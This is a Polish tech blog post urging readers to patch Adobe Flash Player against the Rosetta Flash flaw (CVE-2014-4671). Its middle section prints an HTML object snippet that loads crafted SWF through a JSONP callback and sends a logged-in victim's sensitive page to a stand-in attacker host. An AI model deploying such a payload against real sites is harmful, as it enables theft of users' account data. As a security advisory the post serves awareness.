Menu
Jak włączyć ukrytą funkcję nagrywanie rozmów w Samsung Galaxy S5

Jak włączyć ukrytą funkcję nagrywan…

Zanim operator położy swo...

Windows 8.1 problem czarnego ekranu

Windows 8.1 problem czarnego ekranu

Od jakiegoś czasu na rynk...

Magiczny kwadrat oprogramowania zarządzającego urządzeniami mobilnymi z systemem operacyjnym (MDM)

Magiczny kwadrat oprogramowania zar…

Zainteresowanie oraz um...

DarkNet, DarkWeb w I2P

DarkNet, DarkWeb w I2P

I2P VPN i sieć wirtualnyc...

Support dla Windows 10 Preview

Support dla Windows 10 Preview

Microsoft co chwilę wypus...

Windows 10 zalegalizuje wszystkie pirackie wersje starych Windowsów - chyba nie do końca

Windows 10 zalegalizuje wszystkie p…

„Jesteśmy podekscytowani,...

Kalendarz Cal na Windows Phone dziś za darmo!!!

Kalendarz Cal na Windows Phone dziś…

Tylko dziś promocyjnie ka...

Czy moje konto jest bezpieczne?

Czy moje konto jest bezpieczne?

Hackerzy wciąż nas zaskak...

Apple watch inaczej

Apple watch inaczej

No cóż emocje opadły po p...

Buszowanie po Internecie poprzez SMS

Buszowanie po Internecie poprzez SM…

Większość z nas chwali so...

Prev Next

Adobe Flash Player bardzo ważny update!!! Wyróżniony

Adobe Flash Player bardzo ważny update!!! Adobe Flash Player bardzo ważny update!!! HDT@

Właśnie wyszła bardzo ważna poprawka Adobe Flash Playera, która podobno ma na celu załatanie poważnej dziury bezpieczeństwa.

Podobno wcześniejsze wersje pozwalały na przejmowanie różnego rodzaju dostępów do kont gdzie logowanie odbywa się webowo w przeglądarce. Przez to należy ową poprawkę rozumieć, jako krytyczną i natychmiast podnieść wersję swojego Adobe Flash Player. Niestety nikt nie ma pewności, że tym samym nasza maszyna nie staje się podatna na inne zagrożenia… 

Luka, o której mowa nosi nazwę Rosetta Flash (CVE-2014-4671) i wykorzystuje ona przekształcanie plików SWF z postaci binarnej do alfanumerycznej i dotyczy serwisów wykorzystujących JSONP. By samemu dokonać akademickich ćwiczeń i testować penetrację poprzez wykorzystanie tej dziury można stworzyć plik HTML ze specjalnie spreparowanym apletem:

<object type="application/x-shockwave-flash"

data="https://dziurawastrona.pl/endpoint?callback=CWSMIKI0hCD0Up0IZUnnn...kod_SWF..."

style="display: none">

<param name="FlashVars"

value="url=https://dziurawastrona.pl/account/sensitive_content_logged_in

&exfiltrate=http://atakujacy.pl/log.php">

</object>

;po czym w pliku crossdomain.xml zezwolić na połączenia przychodzące z innych domen by wykradać dane. Ciekawostką jest fakt, że luka ta znana była od jakiegoś czasu, ale od niedawna dopiero była szerzej wykorzystywana gdyż zostało opublikowane narzędzie do jej użycia. 

 

Skomentuj

Upewnij się, że pola oznaczone wymagane gwiazdką (*) zostały wypełnione. Kod HTML nie jest dozwolony.



Uzupełnij układankę ;-)Joomla CAPTCHA
Powrót na górę

Wyszukane

Ciekawostki

How to

Tools

O nas

HDT@